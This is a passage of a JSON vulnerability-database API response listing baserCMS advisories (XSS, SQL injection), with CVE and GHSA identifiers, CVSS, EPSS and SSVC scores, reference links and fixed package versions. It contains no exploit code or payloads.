                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43649"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fw9x-cqjq-7jx5",
                    "reference_id": "GHSA-fw9x-cqjq-7jx5",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-fw9x-cqjq-7jx5"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5",
                    "reference_id": "GHSA-fw9x-cqjq-7jx5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.8.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/67580?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"
                }
            ],
            "aliases": [
                "CVE-2023-43649",
                "GHSA-fw9x-cqjq-7jx5"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/109461?format=api",
            "vulnerability_id": "VCID-k575-suuf-7bhf",
            "summary": "baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-41994",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00143",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34314",
                            "published_at": "2026-06-04T12:55:00Z"
                        },
                        {
                            "value": "0.00143",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34412",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-41994"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_53682526",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_53682526"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://jvn.jp/en/jp/JVN53682526/index.html",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/"
                        }
                    ],
                    "url": "https://jvn.jp/en/jp/JVN53682526/index.html"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41994",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41994"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vxwf-79ch-f7f7",
                    "reference_id": "GHSA-vxwf-79ch-f7f7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vxwf-79ch-f7f7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/146599?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.7.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-j37y-gws9-ake9"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zsgc-fnen-b7a6"
                        },
                        {
                            "vulnerability": "VCID-zxns-tzw3-27fr"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"
                }
            ],
            "aliases": [
                "CVE-2022-41994",
                "GHSA-vxwf-79ch-f7f7"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90792?format=api",
            "vulnerability_id": "VCID-k5qv-4yp3-zbgf",
            "summary": "baserCMS has an SQL injection vulnerability in its blog post functionality\nbaserCMS has an SQL injection vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nMalicious SQL may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_52157568\n\n### Credits\n\nMirai Matsumoto@Future Secure Wave, Inc.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02096",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p",
                    "reference_id": "GHSA-vh89-rjph-2g7p",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-27697",
                "GHSA-vh89-rjph-2g7p"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56066?format=api",
            "vulnerability_id": "VCID-khft-xvrw-g3dr",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request\nXSS vulnerability in HTTP 400 Bad Request to baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0087",
                            "scoring_system": "epss",
                            "scoring_elements": "0.75582",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_06274755",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_06274755"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995",
                    "reference_id": "CVE-2024-46995",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv",
                    "reference_id": "GHSA-mr7q-fv7j-jcgv",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv",
                    "reference_id": "GHSA-mr7q-fv7j-jcgv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46995",
                "GHSA-mr7q-fv7j-jcgv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/110302?format=api",
            "vulnerability_id": "VCID-kmpp-6j49-pqfz",
            "summary": "baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability\nThere is a cross-site scripting vulnerability on the management system of baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.1 and earlier versions.\n\n### Vulnerability\nExecution of malicious JavaScript code may alter the display of the page or leak cookie information.\n- In Favorite registration (CVE-2022-39325)\n- In Permission Settings (CVE-2022-41994)\n- In User group management (CVE-2022-42486)\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\n### Credits\n- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.\n- YUYA KOTAKE@CARTA HOLDINGS, INC.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-39325",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00687",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72163",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00687",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72122",
                            "published_at": "2026-06-04T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-39325"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_53682526",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_53682526"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39325",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39325"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-395x-wv32-44v5",
                    "reference_id": "GHSA-395x-wv32-44v5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-395x-wv32-44v5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/146599?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.7.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-j37y-gws9-ake9"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zsgc-fnen-b7a6"
                        },
                        {
                            "vulnerability": "VCID-zxns-tzw3-27fr"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"
                }
            ],
            "aliases": [
                "CVE-2022-39325",
                "GHSA-395x-wv32-44v5"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56058?format=api",
            "vulnerability_id": "VCID-mfm9-gsh3-ubg8",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature\nXSS vulnerability in Blog posts feature to baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01236",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79576",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
